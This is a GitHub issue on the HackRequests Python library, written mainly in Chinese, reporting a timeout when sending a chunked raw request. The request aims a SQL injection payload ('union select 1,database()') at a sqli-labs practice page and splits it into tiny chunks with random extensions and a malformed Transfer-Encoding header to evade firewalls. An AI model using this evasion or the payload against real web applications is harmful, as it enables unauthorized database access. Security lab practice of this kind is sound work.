### ISSUE TITLE
hackrequests Chunke请求报错。

### ISSUE THREAD

**Issue by x6h0st** [boy-hack/hack-requests#4]
`hack = HackRequests.hackRequests()
raw = '''
POST /sql/Less-11/ HTTP/1.1
Host: 10.211.55.8
Cache-Control: max-age=0
Origin: http://10.211.55.8
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.121 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Referer: http://10.211.55.8/sql/Less-11/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Connection: close
Transfer-Encoding : Chunked

2;ij6UZe
un
2;5
am
2;IwHX2o
e=
2;X35zW12
1'
2;HFGB7rMSR
 u
2;KsE78P
ni
2;M1Fdkrg
on
2;Th6CVFx
 s
2;dpcEw
el
1;LTHfxIAJ
e
1;ctPg2
c
1;TsichgBAd
t
1;Lce80

1;kydZMOU
1
1;Levj0
,
1;bvkR0X
d
1;nLOqbF
a
1;m6plNU
t
1;oph3G7O
a
1;uzAO83
b
1;tL
a
1;JYyfR
s
1;g2rqHx
e
1;PqXk4j
(
1;ZXDEJ24wo
)
1;kh3xS8

1;PD1
-
1;N1O6Aei4I
-
1;6Il1

1;HSh7ezp
&
1;nzh
p
1;U
a
1;SHw1PdWv
s
1;AH
s
1;q
w
1;YX
d
1;V
=
1;9Q
1
1;nXU
&
1;vbWp5fX
s
1;T
u
1;UPtS
b
1;fiID8
m
1;sg0v
i
1;4A
t
1;yYi5u9e
=
1;wocBjAG
S
1;q5i
u
1;yNofKmW0
b
1;I4n5
m
1;ovFs
i
1;f
t
0

'''
aa = hack.httpraw(raw)
print(aa.text())`

Traceback (most recent call last):
  File "/PyCharm/untitled/hackrequests.py", line 188, in <module>
    aa = hack.httpraw(raw)
  File "/usr/local/lib/python3.7/site-packages/HackRequests/HackRequests.py", line 178, in httpraw
    return self.http(url, post=post, headers=d, proxy=proxy, location=location)
  File "/usr/local/lib/python3.7/site-packages/HackRequests/HackRequests.py", line 234, in http
    rep = conn.getresponse()
  File "/usr/local/Cellar/python/3.7.0/Frameworks/Python.framework/Versions/3.7/lib/python3.7/http/client.py", line 1321, in getresponse
    response.begin()
  File "/usr/local/Cellar/python/3.7.0/Frameworks/Python.framework/Versions/3.7/lib/python3.7/http/client.py", line 296, in begin
    version, status, reason = self._read_status()
  File "/usr/local/Cellar/python/3.7.0/Frameworks/Python.framework/Versions/3.7/lib/python3.7/http/client.py", line 257, in _read_status
    line = str(self.fp.readline(_MAXLINE + 1), "iso-8859-1")
  File "/usr/local/Cellar/python/3.7.0/Frameworks/Python.framework/Versions/3.7/lib/python3.7/socket.py", line 589, in readinto
    return self._sock.recv_into(b)
socket.timeout: timed out

Process finished with exit code 1

**Comment by boy-hack** [comment]
新版本将修复此问题
